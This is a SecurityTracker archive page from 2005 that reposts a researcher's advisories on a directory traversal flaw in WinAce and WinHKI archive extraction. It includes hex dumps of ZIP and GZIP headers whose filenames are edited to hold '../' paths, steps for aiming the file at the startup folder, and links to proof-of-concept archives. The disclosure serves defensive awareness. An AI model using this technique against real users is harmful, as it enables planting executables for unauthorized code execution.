Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
WinAce ZIP and GZIP Directory Traversal Flaw Lets Malicious Archives Create Files in Alternate Locations
|
|
SecurityTracker Alert ID: 1012795
|
|
SecurityTracker URL: http://securitytracker.com/id?1012795
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jan 6 2005
|
Impact: Modification of system information, Modification of user information
|
Exploit Included: Yes
|
Version(s): 2.5
|
Description: Rafel Ivgi reported a vulnerability in WinAce. A remote user can create a ZIP or GZIP archive that, when processed by the target user, will extract the file to an alternate location.
A user can create an archive that contains '../' directory traversal characters in the path to specify an alternate location. Then,
when the target user extracts the archive using WinAce, the file will be written to the alternate location.
|
Impact: A remote user can create a malicious ZIP or GZIP archive that, when processed by the target user, will extract the file to an alternate location.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.winace.com/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Windows (Any)
|
Reported By: "Rafel Ivgi, The-Insider" <theinsider@012.net.il>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 06 Jan 2005 10:21:39 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@012.net.il>
Subject: WinAce & WinHKI - ZIP File Directory Transversal
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: WinAce, WinHKI
Vendors: http://www.webtoolmaster.com
Versions: 1.4d
Platforms: Windows
Bug: ZIP File Directory Transversal
Exploitation: Local (extract file)
Date: 24 Dec 2004
Author: Rafel Ivgi, The-Insider
E-Mail: the_insider@mail.com
Website: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
WinHKI is a file archiever which supports: BH, CAB, HKI, JAR, LHA,TAR, GZ
compressions.
WinAce is a file archiever which supports: CAB, JAR, ZIP, RAR, TAR, GZ,
TAR.GZ, LZA, LHA compressions.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
This is a normal ZIP compressed file header
00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..
00000010 F209 3C2F 0F00 C8EE 0F00 0700 0000 7370 ..</..........sp
00000020 352E 6578 65EC 5A7F 5454 577E 7F33 0C30 5.exe.Z.TTW~.3.0
00000030 C0C0 1B94 8926 6A32 2AAE D9FC 206E 2628 .....&j2*... n&(
00000040 2018 1186 4044 7D3A E40D 4940 4304 7CCC ...@D}:..I@C.|.
in the following code, we can see how easy it is to change the path
to anywhere we want, including the all users start up folder.
I just overwrited the original long file name to /../../sp5.exe
00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..
00000010 F209 3C2F 0F00 C8EE 0F00 1000 0000 7662 ..</..........vb
00000020 2F2E 2E2F 2E2E 2F73 7035 2E65 7865 EC5A /../../sp5.exe.Z
00000030 7F54 5457 7E7F 330C 30C0 C01B 9489 266A .TTW~.3.0.....&j
00000040 322A AED9 FC20 6E26 2820 1811 8640 447D 2*... n&( ...@D}
All we need to do is zip compress (using winzip, winrar, winace)
a file with a long name/path and change the path specified inside the file
to whatever we want Using any Hex editor such as HexWorkshop, just add
anything to the filename.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
An online proof of concept can be found at:
http://theinsider.web1000.com/WINACE-WINHKI ZIP TRANSVERSAL.zip
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S , but they will never HACK me."
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: WinAce
Vendors: http://www.webtoolmaster.com
Versions: 1.4d
Platforms: Windows
Bug: GZIP File Directory Transversal
Exploitation: Local (extract file)
Date: 24 Dec 2004
Author: Rafel Ivgi, The-Insider
E-Mail: the_insider@mail.com
Website: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
WinAce is a file archiever which supports: CAB, JAR, ZIP, RAR, TAR, GZ,
TAR.GZ, LZA, LHA compressions.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
This is a normal GZIP compressed file header
00000000 1F8B 0808 DC89 9641 0000 7769 6E33 322D .......A..win32-
00000010 7368 656C 6C63 6F64 652E 7064 6600 BCBC shellcode.pdf...
00000020 073C 95FF FB3F 5E66 227B 671C 2487 749C .<...?^f"{g.$.t.
00000030 7D8E 5956 F626 23C9 96BD B790 BD77 F6C8 }.YV.&#......w..
00000040 2622 2264 9411 2111 45F6 5656 4684 28FF &""d..!.E.VVF.(.
in the following code, we can see how easy it is to change the path
to anywhere we want, including the all users start up folder.
I just overwrited the original long file name to /../../sp5.exe
00000000 1F8B 0808 CE7D A441 0000 2E2E 2F2E 2E2F .....}.A..../../
00000010 2E2E 2F2E 2E2F 2E2E 2F72 6166 692E 6578 ../../../rafi.ex
00000020 6500 B329 4E2E CA2C 2849 B34B CC49 2D2A e..)N..,(I.K.I-*
00000030 D1D0 B4D1 8708 D8F1 7201 0045 5910 EA1B ........r..EY...
00000040 0000 00 ...
All we need to do is GZIP compress (using winace)
a file with a long name/path and change the path specified inside the file
to whatever we want Using any Hex editor such as HexWorkshop, just add
anything to the filename.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
An online proof of concept can be found at:
http://theinsider.deep-ice.com/winace gz file transversal.gz
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S , but they will never HACK me."
|
|
Go to the Top of This SecurityTracker Archive Page
|
